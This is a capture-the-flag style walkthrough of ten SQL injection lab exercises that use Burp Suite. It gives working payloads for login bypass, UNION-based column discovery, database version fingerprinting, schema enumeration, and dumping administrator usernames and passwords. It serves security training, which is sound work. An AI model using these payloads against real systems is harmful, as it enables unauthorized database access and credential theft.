- Retrieving hidden data
1.Lab: SQL injection vulnerability in WHERE clause allowing retrieval of hidden data
- Solutions
'+OR+1=1---> Required
The server can also respond for the following
'OR+'1'='1--'OR+'1'='1'--'OR+'1'--'OR+true--'OR+'a'='a'--/OR+1=1--)'OR+1=1--""OR+1=1--)*OR+1=1--
2.Lab: SQL injection vulnerability allowing login bypass
-
Solutions
- username :
administrator'--password :'' - username :
a'OR+1=1--password :''
- username :
3.Lab: SQL injection UNION attack, determining the number of columns returned by the query
- Solutions
The first step of such an attack is to determine the number of columns that are being returned by the query.
The server will responed for 'ORDER+BY+1-- 'ORDER+BY+2-- 'ORDER+BY+3-- that mean there are 3 columns in the database.
'+UNION+SELECT+NULL,NULL,NULL--'UNION+SELECT+NULL,NULL,NULL--'union+select+null,null,null--
4.Lab: SQL injection UNION attack, finding a column containing text
- Solutions
The server responed for '+UNION+SELECT+NULL,'xyz',NULL-- that is mean the second column containing text.
Make the database retrieve the string: 'IyLLPT' #Noted in the top of the screen,it can be diffrent in your case
'+UNION+SELECT+NULL,'IyLLPT',NULL--
5.Lab: SQL injection UNION attack, retrieving data from other tables
- Solutions
By applying '+UNION+SELECT+NULL,NULL-- we can say the database has tow columns.
By applying '+UNION+SELECT+'abc','xyz'-- we can say the columns have string values.
To retrieve the contents of the users table we can use the following payload
'+UNION+SELECT+username,+password+FROM+users--
where username is the name of first column ,password is the name of second column and users is the name of the table in the database.
Example
Database name : USERS
| username | password |
|---|---|
| administrator | bp6w7q9023goawolzuyh |
| Content in the first column | Content in the second column |
Now to solve the challenge go to Response in Burp Suite from raw search for administrator and its password bp6w7q9023goawolzuyh
6.Lab: SQL injection UNION attack, retrieving multiple values in a single column
-
Solutions
By applying
'+UNION+SELECT+NULL,NULL--we can say the database has tow columns. By applying'+UNION+SELECT+NULL,'abc'--we can say the second column has string values. Now to retrieve data from only one column we can use the following payload'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
||'~'|| will join username and password like administrator~wet39rb7kc6kt99lq0o6
Now to solve the challenge go to Response in Burp Suite and get the username~password administrator~wet39rb7kc6kt99lq0o6
7.Lab: SQL injection attack, querying the database type and version on Oracle
- Solutions
On Oracle databases, every SELECT statement must specify a table to select FROM. If your UNION SELECT attack does not query from a table, you will still need to include the FROM keyword followed by a valid table name.
There is a built-in table on Oracle called DUAL which you can use for this purpose. For example: UNION SELECT 'abc' FROM DUAL
By applying '+UNION+SELECT+NULL,NULL+FROM+DUAL-- we can say the database has tow columns.
By applying '+UNION+SELECT+'abc','xyz'+FROM+DUAL-- we can say the first and second columns have string values.
to retrieve the version of the database, for Oracle we can use cheat sheet:
- SELECT banner FROM v$version
- SELECT version FROM v$instance
the payload will be like:
'+UNION+SELECT+banner,NULL+FROM+v$version--
'+UNION+SELECT+version,NULL+FROM+v$instance--
8.Lab: SQL injection attack, querying the database type and version on MySQL and Microsoft
- Solutions
By applying '+UNION+SELECT+NULL,NULL+FROM+DUAL# we can say the database has tow columns.
By applying '+UNION+SELECT+'abc','xyz'+FROM+DUAL# we can say the first and second columns have string values.
Now to retrieve data from only one column we can use the following payload
to retrieve the version of the database, for Microsoft DB we can use cheat sheet:
Microsoft SELECT @@version
the payload will be like:
'+UNION+SELECT+@@version,NULL+FROM+DUAL#
'+UNION+SELECT+NULL,@@version+FROM+DUAL#
9.Lab: SQL injection attack, listing the database contents on non-Oracle databases
- Solutions
As we can see the Database respond for '+UNION+SELECT+NULL,NULL-- that is mean there are tow tables.
By usin payload '+UNION+SELECT+'abc','xyz'-- we can get that both tables have string values.
use payload '+UNION+SELECT+table_name,+NULL+FROM+information_schema.columns-- to get table name users_xxxx
use payload '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='USERS_ABCDEF'-- o retrieve the details of the columns in the table (replacing the table name) in my case is users_ggighe you can get that by search in bottom right filed in Burp Suite using users
By using '+UNION+SELECT+column_name,+NULL+FROM+information_schema.columns+WHERE+table_name='users_ggighe'-- you can see the user_xxxx and password_xxxx
now change the column by user_xxx,password_xxxx.by using '+UNION+SELECT+username_xxxx,+password_xxxx+FROM+users_xxxx--
then search by administrator and get the password
Finally loging using administrator and its password
10.Lab: SQL injection attack, listing the database contents on Oracle
- Solutions
Note that in Oracle every SELECT statement must specify a table to select FROM.
There is a built-in table on Oracle called DUAL which you can use for this purpose. For example: UNION SELECT 'abc' FROM DUAL.
By using '+UNION+SELECT+'abc','xyz'+FROM+DUAL-- we can say the database has tow columns and both have string values.
By using '+UNION+SELECT+table_name,NULL+FROM+all_tables-- will get the name of the table.
Then use '+UNION+SELECT+column_name,NULL+FROM+all_tab_columns+WHERE+table_name='USERS_TJQMGZ'-- to retrieve the usename and password
After you get the username and password use payload '+UNION+SELECT+USERNAME_TZBHEF,PASSWORD_YAKDEJ+FROM+USERS_TJQMGZ-- to get username and password of the administrator
Finally loging using administrator and its password